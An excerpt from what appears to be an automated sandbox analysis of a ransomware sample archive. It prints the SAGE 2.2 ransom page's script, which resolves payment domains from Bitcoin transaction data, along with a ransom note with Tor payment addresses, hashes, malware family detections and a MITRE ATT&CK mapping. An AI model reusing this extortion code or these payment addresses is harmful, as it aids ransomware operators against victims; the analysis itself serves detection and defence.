var os = json.data.outputs;
for(var i = 0; i < os.length; i++) if(os[i].script.indexOf(OR) == 0) return decodeTxString(os[i].script.substr(10));
return null;
}
},
{bp:'bit'+'aps.co'+'m/api/', txp:'trans'+'action/', adp:'ad'+'dress/tra'+'nsactions/', adpb:'/0/sen'+'t/all',
ptxs: function(json){
var res = [];
for(var i = 0; i < json.length; i++) res.push(json[i][1]);
return res;
},
ptx: function(json){
var os = json.output;
for(var i = 0; i < os.length; i++) if(os[i].script.asm.indexOf(OR) == 0) return decodeTxString(os[i].script.asm.substr(10));
return null;
}
},
{bp:'api.b'+'lockcyp'+'her.com/v1/b'+'tc/main/', txp:'txs/', adp:'addrs/',
ptxs: function(json){
var res = [];
var m = {};
for(var i = 0; i < json.txrefs.length; i++){
var tx = json.txrefs[i].tx_hash;
if(m[tx]) continue;
m[tx] = 1;
res.push(tx);
}
return res;
},
ptx: function(json){
var os = json.outputs;
for(var i = 0; i < os.length; i++) if(os[i].data_hex != null) return decodeTxString(os[i].data_hex);
return null;
}
}
];
function eachUntil(a,f,c){
var i = 0;
var n = function(){
if(i >= a.length) return c('f');
f(a[i++], function(err, res){
if(err == null) return c(null, res);
n();
});
};
n();
}
function getJson(url, cb){
getPage(url, function(err, res){
if(err != null) return cb(err);
var json;
try{
if(window.JSON && window.JSON.parse){
json = window.JSON.parse(res);
}
else{
json = eval('('+res+')');
}
}
catch(e){
cb(e);
}
cb(null, json);
});
}
function getDomains(ad, cb){
eachUntil(sources, function(s, cb){
var url = 'http://'+s.bp;
url+= s.adp+ad;
if(s.adpb) url+= s.adpb;
getJson(url, function(err, json){
if(err != null) return cb(err);
try{
cb(null, s.ptxs(json));
}
catch(e){
cb(e);
}
});
}, function(err, txs){
if(err != null) return cb(err);
if(txs.length == 0) return cb('f');
eachUntil(txs, function(tx, cb){
eachUntil(sources, function(s, cb){
var url = 'http://'+s.bp+s.txp+tx;
getJson(url, function(err, json){
if(err != null) return cb(err);
try{
cb(null, s.ptx(json));
}
catch(e){
cb(e);
}
});
}, function(err, res){
if(err != null) return cb(err);
if(res == null) return cb('f');
cb(null, res.split(':'));
});
}, cb);
});
}
function updateLinks(){
tweakClass('lu', hide);
tweakClass('lu-updating', show);
getDomains('1783wBG'+'sr'+'1zkxenfE'+'ELXA25PLSkL'+'dfJ4B7', function(err, ds){
tweakClass('lu', hide);
if(err != null){
tweakClass('lu-error', show);
return;
}
tweakClass('lu-done', show);
var html = '';
for(var i = 0; i < ds.length; i++) html+= '<div class="key"><a href="http://z5dq36kjy5swjtmr.'+ds[i]+'/login/AQAAAAAAAAAAA76oRTE5CCUGOTBABS4_2ADUs0avuLKWa5JkGz6_PU7A" onclick="javascript:return openlink(this.href)">http://z5dq36kjy5swjtmr.'+ds[i]+'/</a></div>';
tweakClass('links', function(el){
el.innerHTML = html;
});
});
return false;
}
function onPageLoaded(){
try{
tweakClass('lsb', show);
}catch(e){}
try{
tweakClass('lu-orig', show);
}catch(e){}
try{
setLang('en');
}catch(e){}
try{
var args = GetCmd().match(/"[^"]+"|[^ ]+/g);
if(args.length > 1){
var file = args[args.length-1];
if(file.charAt(0) == '"' && file.charAt(file.length-1) == '"') file = file.substr(1, file.length-2);
document.getElementById('filename').innerHTML = file;
show(document.getElementById('file'));
document.title = 'File is encrypted';
}
}catch(e){}
}
</script>
</head>
<body onload='javascript:onPageLoaded()'>
<div class='lsb'>
<span class='ls ls-en' onclick="javascript:return setLang('en')">English</span>
<span class='ls ls-de' onclick="javascript:return setLang('de')">Deutsch</span>
<span class='ls ls-it' onclick="javascript:return setLang('it')">Italiano</span>
<span class='ls ls-fr' onclick="javascript:return setLang('fr')">Français</span>
<span class='ls ls-es' onclick="javascript:return setLang('es')">Español</span>
<span class='ls ls-no' onclick="javascript:return setLang('no')">Norsk</span>
<span class='ls ls-pt' onclick="javascript:return setLang('pt')">Português</span>
<span class='ls ls-nl' onclick="javascript:return setLang('nl')">Nederlands</span>
<br/><span class='ls ls-kr' onclick="javascript:return setLang('kr')">한국어</span>
<span class='ls ls-ms' onclick="javascript:return setLang('ms')">Bahasa Melayu</span>
<span class='ls ls-zh' onclick="javascript:return setLang('zh')">中文</span>
<span class='ls ls-tr' onclick="javascript:return setLang('tr')">Türkçe</span>
<span class='ls ls-vi' onclick="javascript:return setLang('vi')">Tiếng Việt</span>
<span class='ls ls-hi' onclick="javascript:return setLang('hi')">हिन्दी</span>
<span class='ls ls-jv' onclick="javascript:return setLang('jv')">Basa Jawa</span>
<span class='ls ls-fa' onclick="javascript:return setLang('fa')">فارسی</span>
<span class='ls ls-ar' onclick="javascript:return setLang('ar')">العربية</span>
</div>
<div id='file' class='container filecontainer'>
<div class='filename'>
<div style='float:left; padding:18px 0'><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADEAAABACAYAAACz4p94AAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAARCQAAEQkAGJrNK4AAAAB3RJTUUH4QEcFBoaYAOrHQAABThJREFUaN7tmlloXGUUx3/3ziRtTa2xcZ1gtaJFDFjtwSqllaKiiEilKOKDNS2UivXF+qD0QRBRUMQXN/TBBcFifahYFC0urfpghSMqaDSkdQMvojZpIk2zTMaHe776MZ17M6u9ozkwzAwz3/ed/9m+s9yABkhEUFX/+43ATcBy4FxgMdABTAB/Aj8CXwO7VfVdb10AlPy9aqGgTuYDVS3Z56XA48AtdWz1OrBdVQ82AiaoVfJATlWLIrIAeAbYWKciS975LwJ3q+pEJQ03DYRJKVDVGRFZCew0kylnqFaaAULgB+B2Vd1fru3ZKFcDAFS1JCLXA7uBMxs1S29t0fzn5kKhMBBF0WAURYgIURQ1DsIAhKaBVcAbwKk0l0JgGlgIrCkUChpF0U/VAgmrOCBvPrAEeBY4jdZQ3jRyDvCEiJxl2ne+mLowTQs5VZ0yJ95mobMaRx0A3gMGgSPAycCFwHXARQlrfKFeDjwMbG7IsT0zKorIauBtYFGFvxY9s3wZ2Kaqwyn7dgNPpkQ1t9/PwGZV3TNbxErThAOwCOhPADBtexwGNqrqrrR4bxFnBNgkIm8CrwFdCX66BNgA7KlLE2aDeVWdFpHlwPsVfMEBGAXuUtUd1YRGH6CIrLdAESZoYxC4Q1U/r8exQwMQAFdb+CuP7U6LO6oF4MK0d+47ZlpJfJ0HXFsm3OpB2HsPsCZBUtgF9VSZo85KFq7zqnrUTOq3ChYyA3QCq7x1NYFwZnYKsKJCFOqwz59YJKo5VTAmAQ4CuxKiHUCviCyryZzMhIqeOnsSDh8B9qnqTJqU0kKyAT8MfJwiyB5gWa0+ETjGgPOBeQkSGgG+rPdmM99wfjUEHEoA0Q0srRmEaSRv+VFHAogx84lGyO01ChxI+E8XcHq9aUdnhahU8uL471bszJoWVEFHbL8kHhfXCyIE5qesGXX+UW9F5mli0jSbRPMaAdGZ8vtUtSG1ykg1mXIRdzaaxVYjSU7kPmFKaAsq5DW+dBY2WAyV89GV8ntXran4tGfzW4B7K0grAI5WMIF6zAjgD2ATsDXhrPFaGwGZJhE59jrOPMraMIuBK4EzTFqlE8x7YNr6TFUP+dkwQCAiobuhRWQt8DTQl2FlfAtsVdW9DoyviUeA7U1owbSSfL4eU9UHjlVRInI/8FDGATizcvytLhQKQRRFewMRuQJ4y+y/Xcg13IaA/tBCWxftRe5+uwC4NQTWzpabZFgbAFeF1qzKtSEIp40+l+QFtC91hvwHaA7E/xlEKesgZrz6u19VA/eytH64FUGkmSCKtt8XwKWq+opL0GxE8AKwknh6mkkQ03bXRMTT0F9d7m/pfdGy5SHgPtclyRoIZyLfAR95APC6If4A5sOsgfB7UQe88jbJoceI+6+ZdeyOKrWWzxqIwJN+H/F8rlJDzR8XrMiyT1wM3OnX7V797oBeQzxYbF6lJCLTTcpi3fhrBNiiqjsrNCBuIx5Ozs+qT+SJW5vdxHPoS3yHlrjH8nyzAbTCsZ1ZjfPPoMa/DMdpAc0lgHMg2gREqcxPSrSoHdoqx+4Ceu3Sc4x3c/wkNpMgclZT9AIPisjZFl57gUeZZeKThcuuvDhyAppsFfOt9gl/385/w7FLtDmFwF9ebdxO5IQ/HBIPLabaGMT+kLitP9GGAELi4ecHIfAqyc9VZJWc+SvwUi6KorFCofANsA44qQ0AuEfrfgHuUdWB0IqWT4Ebml3At4hywPfAelXd5y47sIfY7XbdQNytuwxYkCHmR4GvgOfcM4fGL38Dzdjo/H/3PFAAAAAASUVORK5CYII=" style='padding:0 7.5px'/></div>
<div>
<h2 class='l l-en' style='display:block'>The file is encrypted but can be restored</h2><h2 class='l l-de' >Die Datei ist verschlüsselt, aber kann wiederhergestellt werden</h2><h2 class='l l-it' >Il file è crittografato, ma può essere ripristinato</h2><h2 class='l l-fr' >Le fichier est crypté mais peut être restauré</h2><h2 class='l l-es' >El archivo está encriptado pero puede ser restaurado</h2><h2 class='l l-no' >Filen er kryptert men kan bli gjenopprettet</h2><h2 class='l l-pt' >O arquivo está criptografado, mas poderá ser descriptografado</h2><h2 class='l l-nl' >Het bestand is versleuteld maar kan worden hersteld</h2><h2 class='l l-kr' >파일은 암호화되었지만 복원 할 수 있습니다</h2><h2 class='l l-ms' >Fail ini dienkripsikan tetapi boleh dipulih semula.</h2><h2 class='l l-zh' >文件已被加密,但是可以解密</h2><h2 class='l l-tr' >Dosya şifrelenmiş ancak geri yüklenebilir.</h2><h2 class='l l-vi' >Tập tin bị mã hóa nhưng có thể được khôi phục</h2><h2 class='l l-hi' >फाइल एनक्रिप्टड हैं लेकिन रिस्टोर की जा सकती हैं</h2><h2 class='l l-jv' >File ini dienkripsi tetapi dapat dikembalikan</h2><h2 class='l l-fa' >این فایل رمزگذاری شده است اما می تواند بازیابی شود</h2><h2 class='l l-ar' > الملف مشفر لكن من الممكن إسترجاعه </h2>
<p><span id='filename'></span></p>
</div>
</div>
<h2 class='l l-en' style='display:block'>The file you tried to open and other important files on your computer were encrypted by "SAGE 2.2 Ransomware".</h2><h2 class='l l-de' >Die Datei, die Sie öffnen wollten, und andere wichtige Dateien auf ihrem Computer wurden von "SAGE 2.2 Ransomware" verschlüsselt.</h2><h2 class='l l-it' >Il file che hai tentato di aprire e altri file importanti del tuo computer sono stati crittografati da "SAGE 2.2 Ransomware".</h2><h2 class='l l-fr' > Le fichier que vous essayez d’ouvrir et d’autres fichiers importants sur votre ordinateur ont été cryptés par "SAGE 2.2 Ransomware".</h2><h2 class='l l-es' >El archivo que intentó abrir y otros importantes archivos en su computadora fueron encriptados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-no' >Filen du prøvde åpne og andre viktige filer på datamaskinen din ble kryptert av "SAGE 2.2 Ransomware".</h2><h2 class='l l-pt' >O arquivo que você está tentando acessar está criptografado, outros arquivos importantes em seu computador também foram criptografados por "SAGE 2.2 Ransomware".</h2><h2 class='l l-nl' >Het bestand dat je probeert te openen en andere belangrijke bestanden op je computer zijn beveiliged door "SAGE 2.2 Ransomware".</h2><h2 class='l l-kr' >컴퓨터에서 여는 파일 및 기타 중요한 파일은 "SAGE 2.2 Ransomware"에 의해 암호화되었습니다.</h2><h2 class='l l-ms' >Fail yang anda cuba buka dan fail penting yang lain di komputer anda telah dienkripskan oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-zh' >您试图打开的文件以及您计算机上的其它文件已经用"SAGE 2.2 Ransomware"进行了加密。</h2><h2 class='l l-tr' >Açmaya çalıştığınız dosya ve diğer önemli dosyalarınızı bilgisayarınızda "SAGE 2.2 Ransomware" tarafından şifrelenmiş.</h2><h2 class='l l-vi' >Tập tin mà bạn cố mở và những tập tin quan trọng khác trên máy tính của bạn bị mã hóa bởi "SAGE 2.2 Ransomware".</h2><h2 class='l l-hi' >वो फाइल जिसे आपने खोलने की कोशिश की और आपके कंप्यूटर पर बाकी महत्वपूर्ण फाइले हमारी ओर से इंक्रिप्टिड की गई हैं "SAGE 2.2 Ransomware"।</h2><h2 class='l l-jv' >File yang Anda coba untuk buka dan file penting lain di komputer Anda yang dienkripsi oleh "SAGE 2.2 Ransomware".</h2><h2 class='l l-fa' >فایلی که ش�
URLs
http://'+s.bp
http://'+s.bp+s.txp+tx
Extracted
Path
C:\XK\Restore-My-Files.txt
Ransom Note
All your files are Encrypted!
For data recovery needs decryptor.
How to buy decryptor:
----------------------------------------------------------------------------------------
| 1. Download Tor browser - https://www.torproject.org/ and install it.
| 2. Open link in TOR browser - hhttp://alcx6zctcmhmn3kx.onion/
| 3. Follow the instructions on this page
----------------------------------------------------------------------------------------
Note! This link is available via "Tor Browser" only.
------------------------------------------------------------
Free decryption as guarantee.
Before paying you can send us 2 file for free decryption.
------------------------------------------------------------
alternate address - http://dtutgqjuzv7sktgl.onion/
DO NOT CHANGE DATA BELOW
###h7dlrwhrvtghr###����������32 B8 E9 D5 5D 10 CC 5C 5B F6 C5 B4 EC 69 EA 2C
6E 01 DB 09 B3 91 72 BE 13 19 18 D9 08 51 0E 63
D0 92 D2 D5 72 A0 75 E8 E9 E6 75 8C 98 6D 6E AE
00 E8 9D 2B 09 CF 74 C4 AC C2 E8 F1 30 DB 58 EB
84 CC 0B 9E 05 C5 8F 3B EB BF 7F 7C F1 AC 39 B2
E6 77 3A B8 6A 59 71 AB 84 91 BC 32 6B 55 AF BD
66 43 4F C4 BC 35 0A FE 4B 45 7D 4D 68 BF 82 41
A3 C4 A0 C2 9A 7B 54 AF 83 C3 17 BA 29 40 99 B9
4A AE 59 37 46 E8 4F 18 8A D0 DD 9A AD 96 E3 9A
EA FE 2E 2E 25 49 9B 9C 5A B9 E4 E3 64 AD A0 24
56 CE 5F 14 AA F8 18 7D FA 0F C5 EF 7C 29 09 F5
B9 D5 FB 32 F3 82 61 94 D8 56 E2 2E 5C 45 29 CC
6F 0B F7 E5 11 8D F5 6C 42 64 D3 7E BD D0 97 91
F4 B4 59 70 0B 5C 48 E5 A8 89 5F A3 1A 7C FC 37
1A F2 C8 CA 26 3D 11 35 CF F4 B2 A4 9A 4F 5E 19
DA AD 83 96 21 BF 6F A3 22 09 3E EE 9E 4B 13 09
###�������������
URLs
http://dtutgqjuzv7sktgl.onion/
Targets
-
-
Target
RNSM00361.7z
-
Size
22.0MB
-
MD5
178c5959b76748b2dc7b8375d12db80e
-
SHA1
f292fe20d20524d7d9ac5658f35c4b85bea72112
-
SHA256
f526608a5b27e9f3b290011efc5ed2098a48cbb522d15f7788dcda4158a23f49
-
SHA512
9dc3274909bb0d6a39da8008d9c72ded281581f8ceab4e667670cf8e29fe5fca173ea7a2f53d1a34effeceac0105029202f83d83a1ecb1a548009aa81c4f18c0
-
SSDEEP
393216:uM1EMy1RIPjtv22c20MTko/jMbyQ4kFnsMXzoBzapYxt3Ld:uQPyPI5vvc2ZuQkqMM9a+h
Score10/10-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
Dharma
Dharma is a ransomware that uses security software installation to hide malicious activities.
-
Dharma family
-
GandCrab payload
-
Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
-
Gandcrab family
-
GlobeImposter
GlobeImposter is a ransomware first seen in 2017.
-
Globeimposter family
-
HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
-
Hawkeye family
-
Matrix Ransomware
Targeted ransomware with information collection and encryption functionality.
-
Matrix family
-
Modifies WinLogon for persistence
-
Modifies Windows Defender Real-time Protection settings
-
Modifies visibility of file extensions in Explorer
-
Modifies visiblity of hidden/system files in Explorer
-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Troldesh family
-
Troldesh, Shade, Encoder.858
Troldesh is a ransomware spread by malspam.
-
Windows security bypass
-
Contacts a large (7734) amount of remote hosts
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows
This may indicate a network scan to discover remotely running services.
-
Deletes shadow copies
Ransomware often targets backup files to inhibit system recovery.
-
Renames multiple (292) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Blocklisted process makes network request
-
Disables RegEdit via registry modification
-
Disables use of System Restore points
-
Drops file in Drivers directory
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Credentials from Password Stores: Windows Credential Manager
Suspicious access to Credentials History.
-
Drops startup file
-
Executes dropped EXE
-
Loads dropped DLL
-
Modifies system executable filetype association
-
Reads user/profile data of web browsers
Infostealers often target stored browser data, which can include saved credentials etc.
-
Uses the VBS compiler for execution
-
Windows security modification
-
Adds Run key to start application
-
Checks installed software on the system
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s)
-
Enumerates connected drives
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry
Disk information is often read in order to detect sandboxing environments.
-
Network Service Discovery
Attempt to gather information on host's network.
-
Network Share Discovery
Attempt to gather information on host network.
-
Drops file in System32 directory
-
Sets desktop wallpaper using registry
-
Suspicious use of SetThreadContext
-
UPX packed file
Detects executables packed with UPX/modified UPX open source packer.
-
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Change Default File Association
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1Direct Volume Access
1Hide Artifacts
3Hidden Files and Directories
3Impair Defenses
3Disable or Modify Tools
3Indicator Removal
2File Deletion
2Modify Registry
12Subvert Trust Controls
1Install Root Certificate
1Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Discovery
Browser Information Discovery
1Network Service Discovery
3Network Share Discovery
1Peripheral Device Discovery
2Query Registry
5Remote System Discovery
1System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1